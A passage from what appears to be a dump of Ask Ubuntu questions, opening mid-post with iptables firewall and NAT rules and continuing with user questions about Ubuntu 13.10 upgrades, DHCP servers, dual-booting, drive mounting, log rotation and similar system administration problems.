accept traffic with the ack flag set -a input -p tcp -m tcp -- tcp-flags ack ack -j accept # allow incoming data that is part of a connection we established -a input -m state -- state established -j accept # allow data that is related to existing connections -a input -m state -- state related -j accept # accept responses to dns queries -a input -p udp -m udp -- dport 1024:65535 -- sport 53 -j accept # accept responses to our pings -a input -p icmp -m icmp -- icmp-type echo-reply -j accept # accept notifications of unreachable hosts -a input -p icmp -m icmp -- icmp-type destination-unreachable -j accept # accept notifications to reduce sending speed -a input -p icmp -m icmp -- icmp-type source-quench -j accept # accept notifications of lost packets -a input -p icmp -m icmp -- icmp-type time-exceeded -j accept # accept notifications of protocol problems -a input -p icmp -m icmp -- icmp-type parameter-problem -j accept # respond to pings , but limit -a input -m icmp -p icmp -- icmp-type echo-request -m state -- state new -m limit -- limit 6/s -j accept # allow connections to ssh server -a input -p tcp -m tcp -- dport 22 -m state -- state new -m limit -- limit 12/s -j accept commit *nat : output accept [ 0:0 ] : prerouting accept [ 0:0 ] : postrouting accept [ 0:0 ] -a prerouting -d 192.168.13.100 -p tcp -m tcp -- dport 2221 -m state -- state new -m limit -- limit 12/s -j dnat -- to-destination 192.168.42.11:22 -a prerouting -d 192.168.13.100 -p tcp -m tcp -- dport 80 -m state -- state new -m limit -- limit 512/s -j dnat -- to-destination 192.168.42.11:80 -a prerouting -d 192.168.13.100 -p tcp -m tcp -- dport 443 -m state -- state new -m limit -- limit 512/s -j dnat -- to-destination 192.168.42.11:443 -a postrouting -d 192.168.42.0/24 -o eth0 -j snat -- to-source 192.168.13.100 -a postrouting -o eth0 -j masquerade commit sysctl : net.ipv4.conf.all.forwarding = 1 net.ipv4.conf.all.mc_forwarding = 0 net.ipv4.conf.default.forwarding = 1 net.ipv4.conf.default.mc_forwarding = 0 net.ipv4.ip_forward = 1 i 've set up full iptables log on the container ; none of the packets addressed to 192.168.13.100 , port 80 is reaching the container . i 've even tried different kernels ( server kernel , raring lts kernel , etc ) , modprobe everything iptables & nat related , nothing . any ideas ?
364975	help to solve kernel problem	below is part of my system log file that is showing a kernel problem . could anyone explain or remedy the problem . the issue is at 10:57:25 time stamp . this happens every time ubuntu is starting up . the laptop later on after about two days stops booting and says `` could not mount / . press s to skip or m for manual recovery '' i updated/upgraded from 13.04 to 13.10 via software updater . 13.04 had no issues with the error below or any other error . tried solutions from this forum but no luck plus i did not have root access to the drive . so i have now re-installed 13.10 a fresh from dvd , the system boots but i still have the same problem . the log file is after the fresh install . any help reply is appreciated . oct 25 10:56:19 ssb anacron [ 891 ] : job `cron.daily ' terminated ( mailing output ) oct 25 10:56:19 ssb anacron [ 891 ] : ca n't find sendmail at /usr/sbin/sendmail , not mailing output oct 25 10:56:19 ssb anacron [ 891 ] : job `cron.weekly ' started oct 25 10:56:19 ssb anacron [ 6653 ] : updated timestamp for job `cron.weekly ' to 2013-10-25 oct 25 10:56:31 ssb anacron [ 891 ] : job `cron.weekly ' terminated oct 25 10:57:25 ssb kernel : [ 898.980086 ] [ drm : intel_pipe_config_compare ] *error* mismatch in adjusted_mode.flags ( expected 2 , found 0 ) **oct 25 10:57:25 ssb kernel : [ 898.980093 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- oct 25 10:57:25 ssb kernel : [ 898.980129 ] warning : cpu : 1 pid : 967 at /build/buildd/linux-3.11.0/drivers/gpu/drm/i915/intel_display.c:8292 check_crtc_state+0x590/0xb30 [ i915 ] ( ) oct 25 10:57:25 ssb kernel : [ 898.980131 ] pipe state does n't match ! oct 25 10:57:25 ssb kernel : [ 898.980134 ] modules linked in : nls_iso8859_1 ( f** ) usb_storage ( f ) parport_pc ( f ) ppdev ( f ) rfcomm bnep bluetooth coretemp hp_wmi joydev ( f ) gpio_ich sparse_keymap uvcvideo arc4 ( f ) videobuf2_vmalloc videobuf2_memops videobuf2_core videodev snd_hda_codec_conexant ath5k snd_hda_intel ath mac80211 snd_hda_codec snd_hwdep ( f ) cfg80211 snd_pcm ( f ) snd_page_alloc ( f ) i915 snd_seq_midi ( f ) snd_seq_midi_event ( f ) snd_rawmidi ( f ) snd_seq ( f ) snd_seq_device ( f ) psmouse ( f ) drm_kms_helper snd_timer ( f ) microcode ( f ) drm snd ( f ) serio_raw ( f ) soundcore ( f ) wmi i2c_algo_bit lpc_ich video ( f ) mac_hid lp ( f ) parport ( f ) hid_generic usbhid hid ahci ( f ) libahci ( f ) 8139too ( f ) 8139cp ( f ) mii ( f ) oct 25 10:57:25 ssb kernel : [ 898.980197 ] cpu : 1 pid : 967 comm : xorg tainted : gf w 3.11.0-12-generic # 19-ubuntu oct 25 10:57:25 ssb kernel : [ 898.980200 ] hardware name : hewlett-packard hp g7000 notebook pc/30d9 , bios f.35 03/29/2010 oct 25 10:57:25 ssb kernel : [ 898.980202 ] 00000000 00000000 f457f8b0 c162566b f457f8f0 f457f8e0 c105273e f8917d40 oct 25 10:57:25 ssb kernel : [ 898.980211 ] f457f90c 000003c7 f890f730 00002064 f88c9630 f88c9630 f6b3364c f6b33000 oct 25 10:57:25 ssb kernel : [ 898.980220 ] 0000000a f457f8f8 c1052793 00000009 f457f8f0 f8917d40 f457f90c f457fb60
364977	isc-dhcp-server not starting on ubuntu13.10	i 'm trying to set a dhcp server on 13.10 . i installed : sudo apt-get install isc-dhcp-server my configuration files look like this : /etc/default/isc-dhcp-server interfaces= '' eth0 '' /etc/network/interfaces auto lo iface lo inet loopback /etc/dhcp/dhcpd.conf ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; subnet 10.167.100.1 netmask 255.255.255.0 { range 10.167.100.150 10.167.100.200 ; } when i run sudo service isc-dhcp-server restart i get : stop : unknown instance : start : job failed to start my ipaddress details : $ ifconfig eth0 link encap : ethernet hwaddr b8 : ca:3a : b6 : b2:33 inet addr:10.167.100.172 bcast:10.167.255.255 mask:255.255.0.0 inet6 addr : fe80 : :baca:3aff : feb6 : b233/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:627294 errors:0 dropped:0 overruns:0 frame:0 tx packets:330047 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:536432668 ( 536.4 mb ) tx bytes:49746041 ( 49.7 mb ) interrupt:20 memory : f7c00000-f7c20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:22009 errors:0 dropped:0 overruns:0 frame:0 tx packets:22009 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1851114 ( 1.8 mb ) tx bytes:1851114 ( 1.8 mb ) $ ip addr 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether b8 : ca:3a : b6 : b2:33 brd ff : ff : ff : ff : ff : ff inet 10.167.100.172/16 brd 10.167.255.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80 : :baca:3aff : feb6 : b233/64 scope link valid_lft forever preferred_lft forever what am i doing wrong here ?
364979	configure `apt-get` to not have to get my confirmation for small packages ?	currently , when i do something like a routine upgrade , it says something like this halfway through : need to get 42.5 mb of archives . after this operation , 36.9 kb of additional disk space will be used . do you want to continue [ y/n ] ? realistically , there 's no case when i 'm gon na go , like : '' 50 kb ! ? i had no idea what i was getting into here ! i 've changed my mind ! abort ! abort ! '' so i 'd like to disable this . i 'm not sure , but i believe there is already a maximum amount of data below which is does n't bother prompting you ... ? so is there a number in a config file somewhere that i can just bump up , or ... ?
364980	ubuntu 12.04 : andorid virtual device : android virtual device not starting up	note : earlier i had asked this question on stackoverflow , but got no responses , hence reposting it here . i am using ubuntu 12.04 ( x86-64 version ) and recently downloaded the adt bundle ( adt-bundle-linux-x86_64-20130917.zip ) from android site . created several virtual devices from eclipse - > window- > android virtual device manager . but the virtual devices are not starting when i click start for any of the avds , a 'starting emulator ' dialog box comes , the loading bar loads fully but nothing starts -- even after considerable wait . tried to run the emulator ( inside sdk/tools ) from console : - ./emulator -avd < avd_name > segmentation fault ( core dumped ) however , when i run this , it throws error but emulator comes up . ./emulator64-arm -avd < avd_name > emulator : error : could not load opengles emulation library : lib64openglrender.so : can not open shared object file : no such file or directory emulator : warning : could not initialize opengles emulation , using software renderer . what may be causing avd to fail when invoked from android virtual device manager inside eclipse ? have anybody faced similar problems ?
364984	isc-dhcp-server assigning self an address	if dhcpd is running on machinea and a wifi connection is attempted with a bad password , the wifi interface on machinea will get assigned an address from dhcpd on machinea . is there a way to prevent this other than stopping dhcpd ?
364985	fan is loud but cpu and temperature is low	this is a problem that i had a while ago ( 1 year ago ) , but i decided to ask about it now . so , my laptop 's ( satellite l-655 ) fan is too loud , but the cpu usage is low and the temperature is low as well ( 44 celcious , from jupiter ) . this problem does not apply only to ubuntu , but on windows 7 as well , so i do n't think it 's ubuntu 's fault . in the summer , i took my laptop for cleanup because of the loud fan and the high temperatures it had at that time - they opened it and removed the dust . the high temperatures were fixed , but not the fan . could this a problem with the hardware ? what could be the cause ?
364987	unable to upgrade from ubuntu 13.04 to ubuntu 13.10	i am new to ubuntu and i am loving it ! i am using ubuntu 13.04 , and i want to upgrade to the latest ubuntu 13.10 , but i ca n't . here is what i am doing : open software updater . it checks for the list of available updates/upgrades and comes up with the message : the software on this computer is up to date . however , ubuntu 13.10 is now available ( you have 13.04 ) . it gives me a list of options : settings upgrade ... ok i click on upgrade . the authentication window comes up , and i give my password . now nothing happens .
364992	internal hds that do n't contain the os are n't accessable unless i try to manually browse them	so i have 4 internal hard drives , one that contains the os ( ubuntu 12.04 ) , all ext4 . after starting the computer up , and without having tried to access the drives ( file manager , terminal etc ) it seems like the drives have n't been mounted . if i go into the `` disks '' utility i see that the disks have n't been mounted . programs that try to access the hd 's during startup throw an error . for example my music player ca n't find the library , my note taking software ca n't find the database etc . but after opening the drive in a file manager everything works . i 've checked smart on all the disks and everything is a ok. any and all ideas would be appreciated .
364997	is it possible to make `` apt-get source -b '' use all cores to compile ?	i am using apt-get source -b to compile some packages but my system has 4 cores and only 1 is used if i run htop . is it possible to force apt-get source to do something like `` make -j4 '' and if yes , how to do it ?
364999	how to install nokia pc suite on ubuntu ?	where can i download and install the nokia pc suite for ubuntu to tranfer data . i am not able to connect my nokia c5 to my pc which has ubuntu as os without the help of nokia pc suite .
365000	top panel , in gnome fallback with no actions , is blank	due to a problem i have with video card overheating , i 've found it expedient to use the gnome fallback in ubuntu 13.10 . this eliminates both unity and compiz , which seem to want to overwork my video card . however , when it first starts up the top panel is blank , not giving any menu items , clock , or even logout-shutdown icon . we can fix this . we have the technology . right click on the panel and remove it . then , on the bottom panel , right click and add a new panel on the top . now , right click on the top panel and choose 'add to panel ' . now , you can add whatever you want . oh , and to move them around , just right click on the icon and choose 'move'
365001	how to install 32bit sdl on 64 bit ubuntu	i have an application that is dependent ia32-libs . but now that this package has been deprecated , it seems like i 'll have to install everything by hand ... it seems that that i can install it like this : sudo apt-get install libsdl1.2-dev : i386 , but apt-get wants to remove some libraries , namely : bbswitch-source libasan0 : i386 libasound2-dev libatomic1 : i386 libcloog-isl4 : i386 libdbus-1-dev libgcc-4.8-dev : i386 libglew1.8 libgmp10 : i386 libgomp1 : i386 libisl10 : i386 libitm1 : i386 libjbig-dev libjpeg-dev libkms1 liblzma-dev libmad0-dev libmikmod2 libmikmod2-dev libmpc3 : i386 libmpfr4 : i386 libpcre3-dev libpcrecpp0 libquadmath0 : i386 libsdl-image1.2 libsdl-mixer1.2 libsdl-ttf2.0-0 libtiff5-dev libtiffxx5 libwebp-dev libxcb-dri2-0-dev libxcb-glx0-dev libxdamage-dev libxfixes-dev libxxf86vm-dev module-assistant nvidia-settings-304-updates primus-libs primus-libs : i386 primus-libs-ia32 : i386 socat ... and this just wo n't do because i 'll to re-install bumblebee . : | am i doing something wrong ? ~
365004	installing ubuntu along with fedora and win 7	i have system in my lab with fedora and windows 7 installed in it . while booting up , the system first shows up fedora and then inside fedora , i can select whether to load windows 7 . i tried windows installer but it is giving an error at the end of installation . i was wondering if its possible to install ubuntu without removing fedora and windows . is it possible to `` shrink volume '' from windows and install ubuntu in the partition ? will it affect the fedora . i dont want fedora to be removed as it may be used by others .
365005	my app is in pending review since month	i wrote a desktop app `` titania '' registered it under https : //myapps.developer.ubuntu.com/dev/apps/ . now month are gone and it is still in pending review with the notice for the new coming upload process . the details to titania are under https : //myapps.developer.ubuntu.com/dev/apps/2136/ what can i do ? is this the right place to publish . are there any news .
365006	how to correctly view htm files containing kanji in the web browser ?	i am trying to read parallel english-japanese texts . when i open them in firefox or chromium , i just see gibberish like : but when i view the markup in kate , i see the characters displayed correctly . with gedit i see gibberish , but a different kind of gibberish than with a browser . the kate editor shows that the encoding is shift_jis , but when i configure this as the fallback encoding nothing happens . please could you explain this behavior and help me correct it ?
365007	ca n't access tty error	i 'm trying to boot up my ubuntu system from a live cd but it shows an error ca n't access tty job control turned off then it waits for me to enter commands how do i solve this ? ?
365008	how to lower monitor screen brightness ?	i 'm using 10.10 ubuntu and i want to reduce my screen brightness . in windows 7 option like calibrate color is available by which i have reduced brightness , is there any thing i can do in ubuntu .
365010	numeric keyboard with a diferent layout	after 13.10 update my numeric keyboard is n't working as it 's should . the numbers are fine , but when i press ∕ `` slash '' it 's show a different / `` slash '' then when i press + . the numeric keypad slash is not the `` right on '' for something like : `` ls /home '' . when i press ⋅ ( it 's should be an * instead ⋅ ) . i realise that if i hold those keys works fine . how to solve this ? i 've tried to change my layout but it did n't help at all ... my layout is a brazilian keyboard abnt2 with a numeric keyboard from a samsung np550p5c thanks in advanced .
365011	shortcut to cd into the only folder	suppose i 'm in ~/a and there is a single folder in ~/a called folder . what shortcut can i press to go inside folder without having to type cd folder ? the reason for this question is that in my real life example there are some elaborate folder names that are annoying to repeatedly type out whenever i want to cd into subdirectories .
365013	getting gnome ubuntu	is their a way to get gnome ubuntu rather then the install disc ?
365014	how to change abiword 's spell check language ?	when i change the language to portuguese on tools > set language in abiword , it continues to spell check in english . i 've tried to purge and reinstall abiword . i have installed the portuguese language trough language support . it installed aspell-pt and other packages for portuguese support . someone can help ?
365028	how can i stop sending my hostname via dhcp ?	ubuntu sends my computer 's configured hostname to any dhcp server it tries to use . how do i stop it from sending a hostname ?
365030	how to make nemo start in foreground ?	i installed nemo from the ubuntu 13.10 saucy repositories , and replaced nautilus with it as shown here : $ xdg-mime default nemo.desktop inode/directory application/x-gnome-saved-search $ gsettings set org.gnome.desktop.background show-desktop-icons false $ gsettings set org.nemo.desktop show-desktop-icons true now , when i start nemo from the unity launcher , it places its window below other windows on the screen . i want nemo to start like nautilus did , and every other application , in the foreground .
365031	menu bars for gnome apps not being replaced by global menu	i have recently had some issues in fixing my nvidia graphics card issues after a new ubuntu 13.10 install - so i may have accidentally screwed up some settings . my problem is that some apps keep their own menu when it should only be shown in the global menu . what i mean is that if i open some applications ( e.g . gnome-terminal , disk usage analyzer , system monitor , totem and others ) i see both the application menu on the app itself as well as the global menu . it does n't matter if i maximise the window or not . after my initial install it all worked ok , i.e . all menus where only shown in the global menu , until my recent issue with my nvidia drivers . how can i get application menus to only be shown in the global menu ( as per the default ubuntu behavior ) ?
365034	hp probook 4540s no dual boot with linux	my problem is .. i have this laptop hp pro book 4540s with win 8 after install mint 15 and ubuntu 13.10 i cant see the grub loader i mean when the machine start go directly to win 8 ? ! ! i did every thing to solve it but no hope .. i fixed grub loader inside ubuntu using live cd and use easy bcd inside win 8 and no thing any one help me please .. sorry my english not so good
365039	tor browser bundle : how to use a rented proxy after connecting to tor ? ( proxy chain )	i want to use the default tor browser bundle from a usb stick and chain my rented proxy after the random tor exit node to hide the fact i am using tor ! from websites ! ( not from my isp ) without giving up the safety of the tor network . so it would look like this : me - > tor network - > rented proxy - > website not the other way around : me - > rented proxy - > tor network - > website which ways are possible to build up such a proxy chain ?
365048	sendmail not working as desired in bash script	this is the code i have in a bash script that runs as a cronjob . the cronjob run as root . /usr/sbin/sendmail myemail @ email.com < < eof subject : backup error ! from : backup @ server01 $ error eof there is code after this and the email i get is as follows : from the root user on the machine . and the message includes : subject : backup error ! from : backup @ server01 $ error eof more code ... that is in the script all the way to the end ... i have tried other variations , this is the closest i 've got . i tried this in a regular script and it worked properly . whats going on , and how can i send this email , specifying the subject and form sender ?
365049	how can i enable screen saver on login ?	system : ubuntu 12.10 running gnome the issue is that when gnome launches , the mouse cursor is immediately placed over the activities link enabling the gnome menu . this means i ca n't immediately start a screen saver or other full screen application on login which is what i want ( screensaver for now ) . is there a way to prevent gnome from placing the mouse at what seems to be position ( 0,0 ) ? ? ( updated with correct ubuntu version )
365050	defining user and userid in a new dierctory	i am trying to run mpich2 on multiple nodes running ubuntu 12.04 . following instructions here . but i got stuck at step 5. : we define a user with same name and same userid in all nodes with a home directory in /mirror . here we name it `` mpiu '' ! i am not able to understand how do we achieve this . what i did is i cd into /mirror . and then use useradd to add a new user . but i do not see any home directory in /mirror . what is wrong here ? also how do we define userid ?
365051	convert transparent image sequence to gif	i want to convert an image sequence into a gif animation , and i 'm using this : convert -delay 100 -loop 0 image*.jpg animation.gif the problem is that for transparent images i can see other images under the animation . why ? for example , with these two images : in the generated gif animation , the first image shown is the `` a '' one , and the second , instead of the `` b '' one , is i really do n't know what 's going on here , what am i missing ?
365052	how to mount drive in /media/username/ like nautilus do using udisks	as of my current installation of ubuntu 13.10 unity , when i click on a drive in nautilus it get mounted in /media/username/mounteddrive i read that nautilus use udisks to do that . basically i want to auto mount my drive using udisks in start up using this method but problem is , it mounts the drive in /media/mounteddrive , but i want it the way nautilus do in /media/username/mountedrive i want ntfs data drive to be auto mounted at /media/bsienn/ bsienn @ bsienn-desktop : ~ $ blkid /dev/sda1 : label= '' system reserved '' uuid= '' 8230744030743d6b '' type= '' ntfs '' /dev/sda2 : label= '' windows 7 '' uuid= '' 60100ea5100e81f0 '' type= '' ntfs '' /dev/sda3 : label= '' data '' uuid= '' 882c04092c03f14c '' type= '' ntfs '' /dev/sda5 : uuid= '' 8768800f-59e1-41a2-9092-c0a8cb60dabf '' type= '' swap '' /dev/sda6 : label= '' ubuntu drive '' uuid= '' 13ea474a-fb27-4c91-bae7-c45690f88954 '' type= '' ext4 '' /dev/sda7 : uuid= '' 69c22e73-9f64-4b48-b854-7b121642cd5d '' type= '' ext4 '' bsienn @ bsienn-desktop : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160000000000 bytes 255 heads , 63 sectors/track , 19452 cylinders , total 312500000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d528d52 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 117730069 58761611 7 hpfs/ntfs/exfat /dev/sda3 158690072 312494116 76902022+ 7 hpfs/ntfs/exfat /dev/sda4 117731326 158689279 20478977 5 extended /dev/sda5 137263104 141260799 1998848 82 linux swap / solaris /dev/sda6 141262848 158689279 8713216 83 linux /dev/sda7 117731328 137263103 9765888 83 linux partition table entries are not in disk order bsienn @ bsienn-desktop : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda7 during installation uuid=69c22e73-9f64-4b48-b854-7b121642cd5d / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=8768800f-59e1-41a2-9092-c0a8cb60dabf none swap sw 0 0 desired effect : picture link
365055	partition errorno 28	while installing from my flash stick which is 4gb big , the installer says i no more have hard drive in space in my created partitions . problem is i did no create any partitions , but my laptop says there are partitions . how do i make partitions with enough space ?
365059	dual-boot ubuntu and windows 8 ( only boots from `` windows boot uefi recovery '' )	yesterday i was finally able to install ubuntu 12.04.3 ( 64 bits ) on my pre-installed windows 8 ( 64 bits ) lenovo ideapad z500 ( if that is of any help ) . i 'll just explain the problem that i have now and if you need more info just ask me ( such as the steps i followed to install ubuntu , etc . ) so i boot the computer ( uefi bios , secureboot disabled , fast startup on windows 8 disabled ) and grub appears correctly ( i already ran bootrepair to achieve this ) , then if i choose ubuntu , it loads correctly . the problem is when i choose windows 8 i receive this error : unknow command `drivemap' invalid efi file path furthermore , in grub i see 2 ubuntu boot options alongside many windows options and i just discovered that clicking one : `` windows boot uefi recovery '' actually boots my windows 8 as usual . so , i actually have a working dual boot , but instead of choosing `` windows 8 ( loader ) '' which does n't boot windows 8 ( and just shows the drivemap error ) i have to select the mentioned `` windows boot uefi recovery '' option to correctly boot windows 8 . is there any way to solve this issue ? ? thanks in advance ! ! cheers , alejandro . p.s . : the bootinfo generated by bootrepair can be found here http : //paste.ubuntu.com/6294680
365061	ubuntu 13.10 gives `` package 'libapache2-mod-auth-mysql ' has no installation candidate '' error	update : because apache 2.4 is the default version ( instead of the previous 2.2 ) this error occurs . however as can be seen here all future versions of ubuntu 13.10 and above will not support this package until it gets fixed upstream . as a work around you do not need to install this package as it is only required for apache authentication against mysql ( as opposed to doing it at the web app end , which is far more common ) i 'm trying to install my lamp environment on ubuntu 13.10 using my script file that can be found here . that script worked for ubuntu 12.04 , ubuntu 13.04 but when i try it on ubuntu 13.10 it gives the following error : e : package 'libapache2-mod-auth-mysql ' has no installation candidate any idea on how to fix this ? note , i do want this package to be installed . edit : i 've found out now that the reason this could not be installed was because it needed the following two packages that were missing : libmysqlclient16 and apache2.2-common . do i just need to install these packages or were they removed for a reason ?
365063	ubuntu gnome 13.10 not updating after remove /var/apt/list/lock and /var/cache/archives/lock	please help me out , any distribution of linux i have installed but still not updating .
365065	messages and syslog files are not getting rotated daily	my syslog file is not getting rotated on daily basis . yesterday , it was of 20gb size , so i took backup of it and zipped the backup ; made the original file to zero bytes . now , it is again 700 mb and does not get rotated on daily basis . the contents of /etc/logrotate.d/rsyslog file are mentioned below . how can i stop unwanted things being added into this file and how can i make sure it is rotated on daily basis ? thank you . /var/log/syslog { rotate 7 daily missingok notifempty delaycompress compress postrotate /sbin/restart rsyslog > /dev/null 2 > & 1 || true endscript }
365067	dualboot help- windows stuck on windows loading when i try to boot it , ubuntu 13.10 works fine though	i installed ubuntu 13.10 the other day , and now when ever i try to get back into windows it keeps getting stuck at windows starting and the windows animation is still working , but it never loads . i tried to repair it has in the start up option for it , and it said the volume was corrupt . when i installed ubuntu though i made sure to have a mount / et4 ( or whatever it was ) and some free space for swap . i followed instructions as had been made on an installation guide . ( knew i should of went with first option in installing ubuntu alongside windows by dual boot in installer ) . now i 'm wondering as to what can i do to atleast save my files from there and if there is a way of repairing it without losing all data on windows .
365069	ubuntu hdd clicks then shuts down	i 've had this problem with 2 pc 's . when i install ubuntu , after a couple a days , my hdd clicks and only the hdd shuts doun . ubuntu freezes and theres no option but to force restart it . after the restar the problem repeats after a couple of minutes . what am i doing wrong ? how can i fix this problem ?
365074	can not install zeromq package from chris-lea/zeromq in 12.04	i ran : % > sudo add-apt-repository ppa : chris-lea/zeromq % > sudo aptitude update % > sudo aptitude install zeromq3 php-zeromq # result : zeromq3 - no such package found i tried restarting my system , running sudo apt-get update , restarting again , but in all cases i get the same package not found result . i have verified that these packages exist for 12.04 by filtering for precise from the `` published in : '' dropdown at the launchpad.net page . what do ?
365077	ca n't reinstall windows 8 after installing ubuntu on a uefi laptop	i am using a samsung laptop which had windows 8 pre-installed . it has a uefi motherboard and secure boot . it also has a hybrid hard drive , so it has a 20gb ssd for the os as well as an hdd . i have made a windows 8 usb drive and everything says it installs fine , although it never boots up ( i can view the windows partition from an ubuntu live usb ) .
365078	installing network manager after uninstallation and removing it	i had problem of speed of wifi in ubunut 13.04 . i changed the network manager and installed wicd instead . but wicd did n't showed any network . so i also uninstalled that before installing another suitable manager . now i am not able to connect to internet . i tried to connect to the internet from the terminal , but failed there . i downloaded two packages on another pc which are : 1 : network-manager-dbg_0.9.8.0-0ubuntu6_amd64.deb . 2 : network-manager-gnome_0.9.8.0-1ubuntu2_amd64.deb . but that did n't installed and it gives and error of unmet dependencies . so any can suggest how to install them from terminal without internet acces . the network-manager-gnome depends on the 1st one .
365079	connecting to internet using tataphoton 3g dongle ( zte mf190 ) ubuntu 12.04	i have bought a new tata docomo photon 3g dongle and i want to use it from ubuntu 12.04 . when i connect the device , its detected but i do n't know how to install the software packed within it or connect to internet . i tried searching for the packages in ubuntu software center but it does n't work . i tried manually adding the device in mobile broadband section , using different apns and service provider names . it made no difference . the device is zte mf190 ( hsupa ) . please tell me how to install the device software or connect to internet without installing the software . how can i fix this ?
365080	unistalling ubuntu with pre installed windows 8 dual boot using windows 8.1 update ?	i want to delete ubuntu , but i have dual booted with pre installed windows 8 . i have been told that i need a windows boot disk in order to do this . however , with the new windows 8.1 update , is there a way to uninstall ubuntu using the windows 8.1 update ?
365085	straight into bios after starting windows 8 on asus zenbook	i have a strange problem for which i hope anyone here has the answer . i recently bought a zenbook prime ux31a . i installed mint 15 ( based on ubuntu 13.04 ) after i switched of the secure boot in the bios , enabled csm in the bios , disabled fast boot in both windows 8 and the bios . during the installation , i decreased the size of the windows partition . everything worked well , until windows 8 installed updates . directly afterwards , i could only get into the bios and where the hard disk would not be visible at all . i also flashed the bios to the lasted version ( 219 ) . it seems that i can kind of fix the problem by a combination of the following steps ( it only seems like it , because it does n't work every time ) : i restore the default settings in the bios . i restart while pressing f9 . i hold the power button for > 40s . start-up tells me that it found an unknown signature . i disable the secure boot and fast boot in bios i restart grub is back , i start the bios again and enable csm ( which i am not allowed to do in 5. or some strange reason ; i need the restart first now i can start linux again without any problems . however , every time i start windows , i have the same problem . does anybody have an idea how i can fix that ? thanks so much in advance .
365087	grant a user permissions on www-data owned /var/www	i have a simple web server setup for some websites , with a layout something like : site1 : /var/www/site1/public_html/ site2 : /var/www/site2/public_html/ i have previously used the root user to manage files , and then given them back to www-data when i was done ( wordpress sites , needed for wp uploads to work ) . this probably is n't the best way . i 'm trying to find a way to create another user ( lets call it user1 ) that has permission to edit files in site1 , but not site2 , and does n't stop the files being 'owned ' by www-data . is there any way for me to do this ?
365088	smokeping web front end on ubuntu 13.10	i have upgraded a pc from ubuntu desktop 12.04 to 13.10 . on 12.04 the url to smokeping web front end used to be http : //localhost/smokeping/smokeping.cgi . after upgrading to 13.10 this does not work any more . is it just an issue of finding out the change of url in ubuntu 13.10 ( with apache 2.4.6 ) or is something missing ? on 12.04 there is a link from /etc/apache2/conf.d/smokeping to /etc/smokeping/apache2.conf . on 13.10 this link no longer exists . nor does the folder conf.d . i tried to make a link from conf-enabled instead but this did not help . i have tried to uninstall and reinstall smokeping , but this did not help . i have installed a fresh ubuntu 13.10 in a vm and installed smokeping there . the apt-get install smokeping installation gives the following error message : non-standard apache configuration or missing apache2ctl , not enabling /etc/smokeping/apache2.conf so i guess smokeping for ubuntu has not been completely ported to the 2.4.6 version of apache used in ubuntu 13.10 ? still i assume that it is easy to fix ?
365091	cant connect to ethernet after system installation ( ubuntu server )	hi im new to linux server edition , and i have installed linux ubuntu server edition on a computer . but under the installation i skipped the network configuration , and now i dont know how to connect to the internet via lan / ethernet
365092	repository/updating/upgrading issue	the other day i was asked to upgrade from 13.04 to 13.10 , at the time i was busy and hit no . i can not upgrade/update at this point , i get ( error -11 ) or a 404 in terminal . in the software updater i get 'failed to download repository information . ' i have tried changing my `` download from '' setting to `` best '' to `` main '' and even a few other countries . and in `` other software '' i have tried disabling packages , but does n't seem to help what so ever . i have tried several of the other commands to try and fix it , such as -fix missing or sudo apt-get update clean . p.s . this has also affected my thunderbird client , i can not send/receive emails . here is my error log when trying to upgrade : jakob @ skeletor : ~ $ sudo update-manager -d gpg : /tmp/tmpvejqvl/trustdb.gpg : trustdb created gpg : /tmp/tmpnayby6/trustdb.gpg : trustdb created traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/defer/__init__.py '' , line 483 , in _inline_callbacks result = gen.throw ( excep ) file `` /usr/lib/python3/dist-packages/updatemanager/backend/installbackendaptdaemon.py '' , line 86 , in commit true , close_on_done ) file `` /usr/lib/python3/dist-packages/defer/__init__.py '' , line 483 , in _inline_callbacks result = gen.throw ( excep ) file `` /usr/lib/python3/dist-packages/updatemanager/backend/installbackendaptdaemon.py '' , line 158 , in _run_in_dialog yield trans.run ( ) aptdaemon.errors.transactionfailed : transaction failed : package does not exist package linux-headers-3.8.0-33 is n't available gpg : /tmp/tmp3kw_hl/trustdb.gpg : trustdb created . and let me throw in my sudo apt-get update too . which this has been working variably too , but i do n't know what to change my repositories to , and disabling does not effect : e : some index files failed to download . they have been ignored , or old ones used instead . this is the short version , but looks exactly like this fairly consistently . sometimes it downloads , sometimes it does n't . sometimes it tells me i have an update , and does n't do anything . if it helps , i have recently had issues trying to install samba as well , and connecting to the office 's nas drive . which works now , but i had to edit /etc/fstab/ and a few other things trying to get that to work as well . i understand it could also be a dns problem , but this has been going on for a few days , as well as i 've already tried changing my dns server via my computer , however i am not allowed to alter the dns on our company 's router .
